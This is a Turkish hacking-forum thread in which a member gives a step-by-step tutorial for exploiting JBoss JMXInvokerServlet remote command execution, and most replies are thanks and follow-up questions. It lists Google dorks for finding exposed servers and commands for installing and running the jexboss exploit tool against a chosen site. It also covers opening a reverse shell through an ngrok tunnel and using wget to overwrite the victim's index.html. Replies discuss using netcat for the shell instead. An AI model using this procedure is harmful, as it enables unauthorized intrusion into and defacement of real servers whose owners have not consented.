[+] JBoss - Remote Command Execution

OBT is HeRYerDe · 18 Haz 2023

Merhaba Değerli TurkHackTeam Üyeleri, Bu Gün Sizlerle JBoss Sunucusunda
Remote Command Execution Güvenlik Açığını Öğrenip Birlikte Sömürmeye Çalışacağız!

1-) JBOSS Nedir?

JBoss az kaynak tüketmesi ile ünlü bir uygulama sunucusudur. JBOSS ücretsizdir. Redhat tarafından 2006 yılında JBOSS’u satın alan firma JAVA’nın her sürümünde JBOSS’u günceller. JBOSS büyük projelerde bile kullanılabilir olması proje maliyetini düşürme yönünde katkı sağlar.

2-) Bu Açık Neden Oluşuyor?


/*
* JBoss JMXInvokerServlet Uzaktan Komut Yürütme
* JMXInvoker.java v0.3 - Luca Carettoni @_ikki
*
* Bu kod, JBoss Uygulama Sunucusunda (4.x, 5.x, ...) yaygın bir hatalı yapılandırmadan yararlanır.
* JMX Invoker, varsayılan yapılandırmayla kullanıma sunulduğunda, kötü amaçlı bir "MarshalledInvocation"
* seri hale getirilmiş Java nesnesi, rastgele kod çalıştırmaya izin verir. Bu istismar, "Web Konsolu" kullanılsa bile çalışır.
* ve "JMX Konsolu" korunur veya devre dışı bırakılır.
*
* [SSS]
*
* S: Hedefim savunmasız mı?
* A: http://<target>:8080/invoker/JMXInvokerServlet varsa, büyük ihtimalle istismar edilebilir
*
* S: Nasıl düzeltilir?
* A: "jmx-invoker-service.xml" içinde kimlik doğrulamayı etkinleştirin
*
* S: Bu açıktan yararlanma sürümüne bağlı mı?
* C: Maalesef evet. Bir yöntemi uygun şekilde çağırmak için bir hash değeri kullanılır.
* En azından sürüm 4.x ve 5.x karşılaştırıldığında, bu karmalar farklıdır.
*
* S: Nasıl derlenir ve başlatılır?
* A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java
* java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker
* Evet, bu bir Java açığıdır. Bazılarınızın şikayet ettiğini şimdiden görebiliyorum...
*/

3-) Tool Kurulumu

[+] Öncelikle Güvenlik Açığını Sömürebilmek İçin Gerekli Toolumuzu Kuruyoruz

Tooldan Görüntü:

[+] Kurulum İçin Kodlarımız


git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt

Toolumuz Artık Kurulu, Hedef Bulmaya Başlayalım

4-) Dork İle Hedef Bulma

Dorkumuzu Aratarak Kendimize Uygun Bir Hedef Seçiyoruz

dorks;


inurl:/web-console/ServerInfo.jsp
inurl:/status?full=true

5-) Açığı Sömürme İşlemi

Terminali Açarak Toolumuzun Olduğu Dizine Geliyoruz, Ardından Komutumuzu Yazıyoruz

python jexboss.py -host https://hedefsite.com

Ardından Enterliyoruz

Eğer Güvenlik Açığı Var İse Bu Şekilde Bir Ekran Bizi Karşılıyor Ve Terminalde
yes/NO? Sorusu Bizi Karşılıyor Bu Kısımda 'yes' Diyerek Enterliyoruz

* Karşımıza 'IP Address (RHOST):' Çıkıyor, Burada Shellin Bize Geri Dönmesi İçin
RHOST'a 0.0.0.0 Değerini Atıyorum.

* RHOST Değerini Atadıktan Sonra Bizden 'Port (RPORT):' Değerini Atamamızı İstiyor, Bu Kısım İçin Ngrok Kullanacağım (kurulumunu forumda bulabilirsiniz)

./ngrok tcp 4444

* Ngrok Üzerinde 4444 Portunu Açtıktan Sonra Exploit Terminalime Geri Gelerek
RPORT'a 4444 Değerini Atıyorum Ve Enterliyorum

- soru gelirse Enter / Yes Diyin

Ardından Bizi 'Shell>' Karşılıyor, Başarılı Bir Şekilde Sızdık!

Ardından RCE Komutumu Çalıştırarak İndex Basıyorum

- Dizini Bulmak İçin Exploit Terminalinde find / -iname "index.html" diyiniz

wget indexbulunduğuyer -O dizin/index.html

enter ve bum

Beni Dinlediğiniz İçin Teşekkürler.

ACE Veen · 18 Haz 2023

OBT is HeRYerDe' Alıntı:
Merhaba Değerli TurkHackTeam Üyeleri, Bu Gün Sizlerle JBoss Sunucusunda
Remote Command Execution Güvenlik Açığını Öğrenip Birlikte Sömürmeye Çalışacağız!

1-) JBOSS Nedir?

JBoss az kaynak tüketmesi ile ünlü bir uygulama sunucusudur. JBOSS ücretsizdir. Redhat tarafından 2006 yılında JBOSS’u satın alan firma JAVA’nın her sürümünde JBOSS’u günceller. JBOSS büyük projelerde bile kullanılabilir olması proje maliyetini düşürme yönünde katkı sağlar.

2-) Bu Açık Neden Oluşuyor?

/* * JBoss JMXInvokerServlet Uzaktan Komut Yürütme * JMXInvoker.java v0.3 - Luca Carettoni @_ikki * * Bu kod, JBoss Uygulama Sunucusunda (4.x, 5.x, ...) yaygın bir hatalı yapılandırmadan yararlanır. * JMX Invoker, varsayılan yapılandırmayla kullanıma sunulduğunda, kötü amaçlı bir "MarshalledInvocation" * seri hale getirilmiş Java nesnesi, rastgele kod çalıştırmaya izin verir. Bu istismar, "Web Konsolu" kullanılsa bile çalışır. * ve "JMX Konsolu" korunur veya devre dışı bırakılır. * * [SSS] * * S: Hedefim savunmasız mı? * A: http://<target>:8080/invoker/JMXInvokerServlet varsa, büyük ihtimalle istismar edilebilir * * S: Nasıl düzeltilir? * A: "jmx-invoker-service.xml" içinde kimlik doğrulamayı etkinleştirin * * S: Bu açıktan yararlanma sürümüne bağlı mı? * C: Maalesef evet. Bir yöntemi uygun şekilde çağırmak için bir hash değeri kullanılır. * En azından sürüm 4.x ve 5.x karşılaştırıldığında, bu karmalar farklıdır. * * S: Nasıl derlenir ve başlatılır? * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java * java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker * Evet, bu bir Java açığıdır. Bazılarınızın şikayet ettiğini şimdiden görebiliyorum... */

3-) Tool Kurulumu

[+] Öncelikle Güvenlik Açığını Sömürebilmek İçin Gerekli Toolumuzu Kuruyoruz

Tooldan Görüntü:

[+] Kurulum İçin Kodlarımız

git clone https://github.com/joaomatosf/jexboss.git cd jexboss pip install -r requires.txt

Toolumuz Artık Kurulu, Hedef Bulmaya Başlayalım

4-) Dork İle Hedef Bulma

Dorkumuzu Aratarak Kendimize Uygun Bir Hedef Seçiyoruz

dorks;
inurl:/web-console/ServerInfo.jsp inurl:/status?full=true

5-) Açığı Sömürme İşlemi

Terminali Açarak Toolumuzun Olduğu Dizine Geliyoruz, Ardından Komutumuzu Yazıyoruz

python jexboss.py -host https://hedefsite.com

Ardından Enterliyoruz

Eğer Güvenlik Açığı Var İse Bu Şekilde Bir Ekran Bizi Karşılıyor Ve Terminalde
yes/NO? Sorusu Bizi Karşılıyor Bu Kısımda 'yes' Diyerek Enterliyoruz

* Karşımıza 'IP Address (RHOST):' Çıkıyor, Burada Shellin Bize Geri Dönmesi İçin
RHOST'a 0.0.0.0 Değerini Atıyorum.

* RHOST Değerini Atadıktan Sonra Bizden 'Port (RPORT):' Değerini Atamamızı İstiyor, Bu Kısım İçin Ngrok Kullanacağım (kurulumunu forumda bulabilirsiniz)

./ngrok tcp 4444

* Ngrok Üzerinde 4444 Portunu Açtıktan Sonra Exploit Terminalime Geri Gelerek
RPORT'a 4444 Değerini Atıyorum Ve Enterliyorum

- soru gelirse Enter / Yes Diyin

Ardından Bizi 'Shell>' Karşılıyor, Başarılı Bir Şekilde Sızdık!

Ardından RCE Komutumu Çalıştırarak İndex Basıyorum

wget indexbulunduğu yer -o dizin/index.html

enter ve bum

Beni Dinlediğiniz İçin Teşekkürler.

eline sağlık mükemmel konu

!Diaspor · 18 Haz 2023

Eline sağlık

darkexploit · 18 Haz 2023

elinize sağlık hocam

Arenklord · 18 Haz 2023

Eline sağlık

ACE Veen · 18 Haz 2023

OBT is HeRYerDe' Alıntı:
Merhaba Değerli TurkHackTeam Üyeleri, Bu Gün Sizlerle JBoss Sunucusunda
Remote Command Execution Güvenlik Açığını Öğrenip Birlikte Sömürmeye Çalışacağız!

1-) JBOSS Nedir?

JBoss az kaynak tüketmesi ile ünlü bir uygulama sunucusudur. JBOSS ücretsizdir. Redhat tarafından 2006 yılında JBOSS’u satın alan firma JAVA’nın her sürümünde JBOSS’u günceller. JBOSS büyük projelerde bile kullanılabilir olması proje maliyetini düşürme yönünde katkı sağlar.

2-) Bu Açık Neden Oluşuyor?

/* * JBoss JMXInvokerServlet Uzaktan Komut Yürütme * JMXInvoker.java v0.3 - Luca Carettoni @_ikki * * Bu kod, JBoss Uygulama Sunucusunda (4.x, 5.x, ...) yaygın bir hatalı yapılandırmadan yararlanır. * JMX Invoker, varsayılan yapılandırmayla kullanıma sunulduğunda, kötü amaçlı bir "MarshalledInvocation" * seri hale getirilmiş Java nesnesi, rastgele kod çalıştırmaya izin verir. Bu istismar, "Web Konsolu" kullanılsa bile çalışır. * ve "JMX Konsolu" korunur veya devre dışı bırakılır. * * [SSS] * * S: Hedefim savunmasız mı? * A: http://<target>:8080/invoker/JMXInvokerServlet varsa, büyük ihtimalle istismar edilebilir * * S: Nasıl düzeltilir? * A: "jmx-invoker-service.xml" içinde kimlik doğrulamayı etkinleştirin * * S: Bu açıktan yararlanma sürümüne bağlı mı? * C: Maalesef evet. Bir yöntemi uygun şekilde çağırmak için bir hash değeri kullanılır. * En azından sürüm 4.x ve 5.x karşılaştırıldığında, bu karmalar farklıdır. * * S: Nasıl derlenir ve başlatılır? * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java * java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker * Evet, bu bir Java açığıdır. Bazılarınızın şikayet ettiğini şimdiden görebiliyorum... */

3-) Tool Kurulumu

[+] Öncelikle Güvenlik Açığını Sömürebilmek İçin Gerekli Toolumuzu Kuruyoruz

Tooldan Görüntü:

[+] Kurulum İçin Kodlarımız

git clone https://github.com/joaomatosf/jexboss.git cd jexboss pip install -r requires.txt

Toolumuz Artık Kurulu, Hedef Bulmaya Başlayalım

4-) Dork İle Hedef Bulma

Dorkumuzu Aratarak Kendimize Uygun Bir Hedef Seçiyoruz

dorks;
inurl:/web-console/ServerInfo.jsp inurl:/status?full=true

5-) Açığı Sömürme İşlemi

Terminali Açarak Toolumuzun Olduğu Dizine Geliyoruz, Ardından Komutumuzu Yazıyoruz

python jexboss.py -host https://hedefsite.com

Ardından Enterliyoruz

Eğer Güvenlik Açığı Var İse Bu Şekilde Bir Ekran Bizi Karşılıyor Ve Terminalde
yes/NO? Sorusu Bizi Karşılıyor Bu Kısımda 'yes' Diyerek Enterliyoruz

* Karşımıza 'IP Address (RHOST):' Çıkıyor, Burada Shellin Bize Geri Dönmesi İçin
RHOST'a 0.0.0.0 Değerini Atıyorum.

* RHOST Değerini Atadıktan Sonra Bizden 'Port (RPORT):' Değerini Atamamızı İstiyor, Bu Kısım İçin Ngrok Kullanacağım (kurulumunu forumda bulabilirsiniz)

./ngrok tcp 4444

* Ngrok Üzerinde 4444 Portunu Açtıktan Sonra Exploit Terminalime Geri Gelerek
RPORT'a 4444 Değerini Atıyorum Ve Enterliyorum

- soru gelirse Enter / Yes Diyin

Ardından Bizi 'Shell>' Karşılıyor, Başarılı Bir Şekilde Sızdık!

Ardından RCE Komutumu Çalıştırarak İndex Basıyorum

wget indexbulunduğu yer -o dizin/index.html

enter ve bum

Beni Dinlediğiniz İçin Teşekkürler.

hocam dizin derken anlamadım orayı wget tht.html -o index.html yapıyorum olmuyor

SecurityFaTHeR · 18 Haz 2023

elinize sağlık güzel anlatım ve konu olmuş

OBT is HeRYerDe · 18 Haz 2023

ACE Veen' Alıntı:
hocam dizin derken anlamadım orayı wget tht.html -o index.html yapıyorum olmuyor

Merhaba Sitede CTRL+U Yap Önce Ardından Bir Dosya İsmi Bul Ki Dizini Bulasın Örneğin index.html ve şu komutu gir 'find / -iname "index.html" işte /server/var/index.html gibi bir şey çıktı diyelim sonraki komut "wget seninindexinyeri -O /server/var/index.html"

SecurityFaTHeR · 18 Haz 2023

OBT is HeRYerDe' Alıntı:
Merhaba Sitede CTRL+U Yap Önce Ardından Bir Dosya İsmi Bul Ki Dizini Bulasın Örneğin index.html ve şu komutu gir 'find -iname "index.html" işte /server/var/index.html gibi bir şey çıktı diyelim sonraki komut "wget seninindexinyeri -O /server/var/index.html"

Hocam dediğiniz işlem netcat ilede yapılabilirmi ngrok olmadan

OBT is HeRYerDe · 18 Haz 2023

SecurityFaTHeR' Alıntı:
Hocam dediğiniz işlem netcat ilede yapılabilirmi ngrok olmadan

yani yapılabilir diye düşünüyorum port aç geri dönüş olsun yeterli

ACE Veen · 18 Haz 2023

OBT is HeRYerDe' Alıntı:
Merhaba Sitede CTRL+U Yap Önce Ardından Bir Dosya İsmi Bul Ki Dizini Bulasın Örneğin index.html ve şu komutu gir 'find -iname "index.html" işte /server/var/index.html gibi bir şey çıktı diyelim sonraki komut "wget seninindexinyeri -O /server/var/index.html"

çok teşekkür ederim hocam

Criminal Laoin · 18 Haz 2023

Eline sağlık

Muslukcu · 18 Haz 2023

OBT is HeRYerDe' Alıntı:
Merhaba Değerli TurkHackTeam Üyeleri, Bu Gün Sizlerle JBoss Sunucusunda
Remote Command Execution Güvenlik Açığını Öğrenip Birlikte Sömürmeye Çalışacağız!

1-) JBOSS Nedir?

JBoss az kaynak tüketmesi ile ünlü bir uygulama sunucusudur. JBOSS ücretsizdir. Redhat tarafından 2006 yılında JBOSS’u satın alan firma JAVA’nın her sürümünde JBOSS’u günceller. JBOSS büyük projelerde bile kullanılabilir olması proje maliyetini düşürme yönünde katkı sağlar.

2-) Bu Açık Neden Oluşuyor?

/* * JBoss JMXInvokerServlet Uzaktan Komut Yürütme * JMXInvoker.java v0.3 - Luca Carettoni @_ikki * * Bu kod, JBoss Uygulama Sunucusunda (4.x, 5.x, ...) yaygın bir hatalı yapılandırmadan yararlanır. * JMX Invoker, varsayılan yapılandırmayla kullanıma sunulduğunda, kötü amaçlı bir "MarshalledInvocation" * seri hale getirilmiş Java nesnesi, rastgele kod çalıştırmaya izin verir. Bu istismar, "Web Konsolu" kullanılsa bile çalışır. * ve "JMX Konsolu" korunur veya devre dışı bırakılır. * * [SSS] * * S: Hedefim savunmasız mı? * A: http://<target>:8080/invoker/JMXInvokerServlet varsa, büyük ihtimalle istismar edilebilir * * S: Nasıl düzeltilir? * A: "jmx-invoker-service.xml" içinde kimlik doğrulamayı etkinleştirin * * S: Bu açıktan yararlanma sürümüne bağlı mı? * C: Maalesef evet. Bir yöntemi uygun şekilde çağırmak için bir hash değeri kullanılır. * En azından sürüm 4.x ve 5.x karşılaştırıldığında, bu karmalar farklıdır. * * S: Nasıl derlenir ve başlatılır? * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java * java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker * Evet, bu bir Java açığıdır. Bazılarınızın şikayet ettiğini şimdiden görebiliyorum... */

3-) Tool Kurulumu

[+] Öncelikle Güvenlik Açığını Sömürebilmek İçin Gerekli Toolumuzu Kuruyoruz

Tooldan Görüntü:

[+] Kurulum İçin Kodlarımız

git clone https://github.com/joaomatosf/jexboss.git cd jexboss pip install -r requires.txt

Toolumuz Artık Kurulu, Hedef Bulmaya Başlayalım

4-) Dork İle Hedef Bulma

Dorkumuzu Aratarak Kendimize Uygun Bir Hedef Seçiyoruz

dorks;
inurl:/web-console/ServerInfo.jsp inurl:/status?full=true

5-) Açığı Sömürme İşlemi

Terminali Açarak Toolumuzun Olduğu Dizine Geliyoruz, Ardından Komutumuzu Yazıyoruz

python jexboss.py -host https://hedefsite.com

Ardından Enterliyoruz

Eğer Güvenlik Açığı Var İse Bu Şekilde Bir Ekran Bizi Karşılıyor Ve Terminalde
yes/NO? Sorusu Bizi Karşılıyor Bu Kısımda 'yes' Diyerek Enterliyoruz

* Karşımıza 'IP Address (RHOST):' Çıkıyor, Burada Shellin Bize Geri Dönmesi İçin
RHOST'a 0.0.0.0 Değerini Atıyorum.

* RHOST Değerini Atadıktan Sonra Bizden 'Port (RPORT):' Değerini Atamamızı İstiyor, Bu Kısım İçin Ngrok Kullanacağım (kurulumunu forumda bulabilirsiniz)

./ngrok tcp 4444

* Ngrok Üzerinde 4444 Portunu Açtıktan Sonra Exploit Terminalime Geri Gelerek
RPORT'a 4444 Değerini Atıyorum Ve Enterliyorum

- soru gelirse Enter / Yes Diyin

Ardından Bizi 'Shell>' Karşılıyor, Başarılı Bir Şekilde Sızdık!

Ardından RCE Komutumu Çalıştırarak İndex Basıyorum

- Dizini Bulmak İçin Exploit Terminalinde find / -iname "index.html" diyiniz

wget indexbulunduğuyer -O dizin/index.html

enter ve bum

Beni Dinlediğiniz İçin Teşekkürler.

Eline sağlık

Ghost Killer · 19 Haz 2023

eline sağlık

OBT is HeRYerDe · 19 Haz 2023

ACE Veen' Alıntı:
eline sağlık mükemmel konu

!Diaspor' Alıntı:
Eline sağlık

darkexploit' Alıntı:
elinize sağlık hocam

Arenklord' Alıntı:
Eline sağlık

SecurityFaTHeR' Alıntı:
elinize sağlık güzel anlatım ve konu olmuş

Criminal Laoin' Alıntı:
Eline sağlık

Muslukcu' Alıntı:
Eline sağlık

Ghost Killer' Alıntı:
eline sağlık

Hepinize Teşekkürler.

P4$A · 19 Haz 2023

Eline sağlık, başarılı

'Mergen · 19 Haz 2023

Elinize sağlık hocam

OBT is HeRYerDe · 19 Haz 2023

P4$A' Alıntı:
Eline sağlık, başarılı

'Mergen' Alıntı:
Elinize sağlık hocam

Teşekkürler.

'HYPERS · 19 Haz 2023

Eline sağlık güzel konulardan

OBT is HeRYerDe · 19 Haz 2023

'HYPERS' Alıntı:
Eline sağlık güzel konulardan

Teşekkürler.

[+] JBoss - Remote Command Execution

Anka Team

Uzman üye

Yeni üye

Üye

Uzman üye

Uzman üye

Uzman üye

Anka Team

Uzman üye

Anka Team

Uzman üye

Uzman üye

Katılımcı Üye

Özel Üye

Anka Team

Uzman üye

Hunter

Anka Team

Üye

Anka Team